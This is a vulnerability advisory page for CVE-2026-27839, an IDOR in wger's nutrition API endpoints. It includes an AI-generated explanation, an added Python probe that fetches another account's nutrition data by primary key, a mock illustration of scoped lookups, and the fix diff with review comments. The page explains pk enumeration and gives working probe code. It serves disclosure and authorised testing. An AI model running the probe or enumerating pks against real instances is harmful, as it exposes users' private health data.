VYPR
Moderate severity · NVD Advisory · Published Feb 26, 2026 · Updated Mar 3, 2026

wger: IDOR in nutritional_values endpoints exposes private dietary data via direct ORM lookup

CVE-2026-27839

Description

wger is a free, open-source workout and fitness manager. In versions up to and including 2.4, three nutritional_values action endpoints fetch objects via Model.objects.get(pk=pk) — a raw ORM call that bypasses the user-scoped queryset. Any authenticated user can read another user's private nutrition plan data, including caloric intake and full macro breakdown, by supplying an arbitrary PK. Commit 29876a1954fe959e4b58ef070170e81703dab60e contains a fix for the issue.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

In wger up to 2.4, three nutritional_values API endpoints use raw ORM get() without user-scoped queries, allowing any authenticated user to read arbitrary users' private nutrition data via PK enumeration.

Vulnerability Description: Three nutritional_values action endpoints in wger's nutrition API (NutritionPlanViewSet, MealViewSet, MealItemViewSet) bypass object-level permissions by directly calling Model.objects.get(pk=pk) instead of using self.get_object() to enforce user scoping. This allows any authenticated user to supply an arbitrary primary key (PK) and retrieve another user's private nutrition plan data, including caloric intake and macro breakdown. The flaw affects versions up to and including 2.4 [1][3].

Exploitation Method: An attacker needs only a valid authentication token for an ordinary account. Primary keys are sequential integers, so enumeration is trivial: by sending GET requests to endpoints like /api/v2/nutritionplan/{pk}/nutritional_values/ and iterating the pk, the attacker obtains other users' dietary data without any victim interaction [3]. On instances that allow self-registration, obtaining such a token costs nothing more than creating an account.
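A verification probe for an instance you are authorised to test, written for this page rather than taken from wger: with one account's token it requests objects that were created under a second account and turns each HTTP response into a verdict. The /api/v2/nutritionplan/{pk}/nutritional_values/ template is the one quoted above; the meal and mealitem templates are assumed by analogy and must be checked against the target's API root before use.

```python
"""Verification probe for the nutritional_values IDOR (CVE-2026-27839).

Added example, not wger project code. The nutritionplan route follows the
pattern given in the advisory text; the meal and mealitem routes are
assumed by analogy and should be confirmed against the target's API root.
"""
import json
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable

# Route templates for the three patched actions (assumed, see module docstring).
ENDPOINTS = {
    "nutritionplan": "/api/v2/nutritionplan/{pk}/nutritional_values/",
    "meal": "/api/v2/meal/{pk}/nutritional_values/",
    "mealitem": "/api/v2/mealitem/{pk}/nutritional_values/",
}

# Keys the advisory lists as exposed; any of them in a 200 body confirms a data read.
MACRO_KEYS = ("protein", "carbohydrates", "fat", "fiber", "sodium")


@dataclass
class HttpResult:
    status: int
    body: str


def urllib_fetch(url: str, token: str) -> HttpResult:
    """GET url with DRF token auth, returning status and body even on 4xx/5xx."""
    req = urllib.request.Request(url, headers={"Authorization": f"Token {token}"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return HttpResult(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return HttpResult(err.code, err.read().decode("utf-8", "replace"))


def classify(result: HttpResult) -> str:
    """Verdict for a request that asks for an object the token's user does NOT own."""
    if result.status == 200:
        try:
            data = json.loads(result.body)
        except ValueError:
            return "unexpected-200"
        if isinstance(data, dict) and any(k in data for k in MACRO_KEYS):
            return "vulnerable"  # another user's macros came back: unscoped lookup
        return "unexpected-200"
    if result.status in (403, 404):
        return "scoped"  # the lookup hid or denied the foreign object
    if result.status == 401:
        return "auth-error"  # token rejected; says nothing about the IDOR
    if result.status >= 500:
        # Consistent with the unpatched code on a pk that does not exist at all:
        # Model.objects.get() raises DoesNotExist, which DRF does not map to 404.
        return "server-error"
    return f"unexpected-{result.status}"


def probe(base_url: str, attacker_token: str, foreign_pks: dict[str, int],
          fetch: Callable[[str, str], HttpResult] = urllib_fetch) -> dict[str, str]:
    """Request each foreign pk (an object owned by a different account) with attacker_token."""
    verdicts = {}
    for name, pk in foreign_pks.items():
        url = base_url.rstrip("/") + ENDPOINTS[name].format(pk=pk)
        verdicts[name] = classify(fetch(url, attacker_token))
    return verdicts


if __name__ == "__main__":
    import sys
    # usage: probe.py https://wger.example ATTACKER_TOKEN PLAN_PK MEAL_PK ITEM_PK
    base, token, plan_pk, meal_pk, item_pk = sys.argv[1:6]
    results = probe(base, token, {"nutritionplan": int(plan_pk),
                                  "meal": int(meal_pk),
                                  "mealitem": int(item_pk)})
    for endpoint, verdict in results.items():
        print(f"{endpoint}: {verdict}")
```

Create the victim objects yourself under a second account and pass their pks. A 200 carrying macro fields means the unscoped lookup is live; 404 or 403 means the lookup is scoped to the caller. A 5xx on a pk that does not exist is what the unpatched `Model.objects.get()` produces, since `DoesNotExist` is not translated into a 404 by DRF.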

Impact: Exposure of sensitive dietary and health information: daily caloric intake, protein, carbohydrates, fat, fiber, sodium, and full meal composition. This violates user privacy and could be leveraged for targeted harassment or competitive advantage in fitness contexts [3].

Mitigation: The fix, introduced in commit 29876a1954fe959e4b58ef070170e81703dab60e, replaces each raw ORM call with self.get_object(), which resolves the pk inside the viewset's owner-filtered queryset and answers 404 for any object the caller does not own [4]. Update to a release containing that commit or apply it manually; the package table on this page lists no patched version, so check the installed code rather than the version string. No configuration-level workaround is given; the endpoints are fixed only after patching.
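To make the fix concrete, a self-contained illustration that is not wger or Django code: a few lines stand in for Django's queryset and DRF's `get_object()`, keeping their names, and the two action methods reproduce the before and after of the patched `nutritional_values` action. Run as user bob against alice's plan pk, the old form returns alice's macros and the new form yields 404; on a pk that does not exist the old form raises DoesNotExist (a 500 under DRF) while the new form again yields 404, so the caller cannot distinguish a foreign object from a missing one.

```python
"""Scoped vs. unscoped lookup: the pattern behind CVE-2026-27839.

Added illustration, not wger or Django code. Stand-ins for Django's
QuerySet and DRF's GenericViewSet.get_object() keep their names so the
two actions below read like the before/after hunk in the fix.
"""
from dataclasses import dataclass


class DoesNotExist(Exception):
    """Stand-in for Model.DoesNotExist; DRF does not map it, so it surfaces as a 500."""


class NotFound(Exception):
    """Stand-in for Http404 / DRF NotFound, rendered as a 404."""


@dataclass
class NutritionPlan:
    pk: int
    user: str
    protein: float
    carbohydrates: float
    fat: float

    def get_nutritional_values(self) -> dict:
        # Same shape the patched action reads: it takes ['total'].
        return {"total": {"protein": self.protein,
                          "carbohydrates": self.carbohydrates,
                          "fat": self.fat}}


class QuerySet:
    def __init__(self, rows):
        self._rows = list(rows)

    def filter(self, **conds) -> "QuerySet":
        return QuerySet(r for r in self._rows
                        if all(getattr(r, k) == v for k, v in conds.items()))

    def get(self, **conds):
        hits = self.filter(**conds)._rows
        if len(hits) != 1:
            raise DoesNotExist(conds)
        return hits[0]


# Constructed table: two users, one plan each, sequential pks as with AutoField.
PLANS = QuerySet([
    NutritionPlan(pk=1, user="alice", protein=150.0, carbohydrates=200.0, fat=70.0),
    NutritionPlan(pk=2, user="bob", protein=120.0, carbohydrates=300.0, fat=60.0),
])


@dataclass
class Request:
    user: str


class NutritionPlanViewSet:
    """Stand-in for an owner-scoped DRF viewset such as wger's WgerOwnerObjectModelViewSet."""

    def __init__(self, request: Request, pk: int):
        self.request = request
        self.kwargs = {"pk": pk}  # DRF stores URL captures here

    def get_queryset(self) -> QuerySet:
        # The scoping lives here: only the caller's own rows are visible.
        return PLANS.filter(user=self.request.user)

    def get_object(self) -> NutritionPlan:
        # DRF's get_object(): resolve the URL pk inside the scoped queryset, else 404.
        try:
            return self.get_queryset().get(pk=self.kwargs["pk"])
        except DoesNotExist:
            raise NotFound(self.kwargs["pk"]) from None

    def nutritional_values_before(self, pk: int) -> dict:
        # Vulnerable form from the diff: a raw ORM lookup that ignores get_queryset().
        return PLANS.get(pk=pk).get_nutritional_values()["total"]

    def nutritional_values_after(self, pk: int) -> dict:
        # Patched form: the lookup goes through the owner-scoped queryset.
        return self.get_object().get_nutritional_values()["total"]


def outcome(action: str, request: Request, pk: int) -> str:
    """Run one action as request.user against pk and summarise the HTTP-level result."""
    view = NutritionPlanViewSet(request, pk)
    try:
        data = getattr(view, action)(pk)
    except NotFound:
        return "404"
    except DoesNotExist:
        return "500"
    return f"200 protein={data['protein']}"


if __name__ == "__main__":
    bob = Request(user="bob")
    for pk in (1, 2, 99):  # alice's plan, bob's own plan, nonexistent
        print(f"pk={pk}: before={outcome('nutritional_values_before', bob, pk)} "
              f"after={outcome('nutritional_values_after', bob, pk)}")
```

The defence is the queryset, not the `pk` check: `get_object()` is only as strong as `get_queryset()`, which is why a review of the real fix should confirm that each affected viewset's queryset is filtered to the requesting user.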

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: wger (PyPI)
Affected versions: <= 2.1
Patched versions: none listed

Note: the advisory-sourced range above (<= 2.1) is narrower than the <= 2.4 range given in the description and under Affected products; check installations against the wider range.

Affected products

2
  • Wger/Wger [llm-fuzzy]
    Range: <= 2.4
  • wger-project/wger [v5]
    Range: <= 2.4

Patches

1
29876a1954fe

Use get_object() to retrieve the user's data

https://github.com/wger-project/wger · Roland Geider · Feb 24, 2026 · via ghsa
1 file changed · +3 −3
  • wger/nutrition/api/views.py · +3 −3 · modified
    @@ -298,7 +298,7 @@ def nutritional_values(self, request, pk):
             Return an overview of the nutritional plan's values
             """
             serializer = NutritionalValuesSerializer(
    -            NutritionPlan.objects.get(pk=pk).get_nutritional_values()['total'],
    +            self.get_object().get_nutritional_values()['total'],
             )
             return Response(serializer.data)
     
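Review bot: the switch to `self.get_object()` is only a fix if this viewset's `get_queryset()` is filtered to `request.user`; the hunk shows neither the base class nor `get_queryset`, so please confirm the queryset is owner-scoped and add a regression test that requests another user's plan pk and expects 404. Note the behavioural change for an unknown pk: `NutritionPlan.objects.get(pk=pk)` raised `DoesNotExist` (unhandled by DRF, so a 500), while `get_object()` raises `Http404`, so anything alerting on those 500s will now see 404s. The `pk` parameter stays in the signature for the router but is no longer used in the body; a one-line comment that the lookup reads `self.kwargs` would stop a later cleanup from reintroducing `pk` here.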
    @@ -353,7 +353,7 @@ def nutritional_values(self, request, pk):
             """
             Return an overview of the nutritional plan's values
             """
    -        serializer = NutritionalValuesSerializer(Meal.objects.get(pk=pk).get_nutritional_values())
    +        serializer = NutritionalValuesSerializer(self.get_object().get_nutritional_values())
             return Response(serializer.data)
     
     
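Review bot: the docstring still reads "Return an overview of the nutritional plan's values" although this action serializes `get_nutritional_values()` of a `Meal`; change it to the meal's values. Same scoping caveat as the plan action: `get_object()` only helps if this viewset's `get_queryset()` restricts meals to the caller, directly or through the owning plan, so please confirm that and cover it with a cross-user test.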
    @@ -400,7 +400,7 @@ def nutritional_values(self, request, pk):
             """
             Return an overview of the nutritional plan's values
             """
    -        return Response(MealItem.objects.get(pk=pk).get_nutritional_values())
    +        return Response(self.get_object().get_nutritional_values())
     
     
     class LogItemViewSet(WgerOwnerObjectModelViewSet):
    
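Review bot: unlike the two sibling actions, this one returns the raw dict from `get_nutritional_values()` without passing it through `NutritionalValuesSerializer`, so the response shape is whatever the model method returns and is neither validated nor described in the API schema; wrap it in the serializer for consistency with the plan and meal actions. The docstring again says "nutritional plan's values" for a meal item. And as above, `get_object()` is only as safe as this viewset's `get_queryset()`, so confirm the item queryset is scoped to the requesting user.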

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.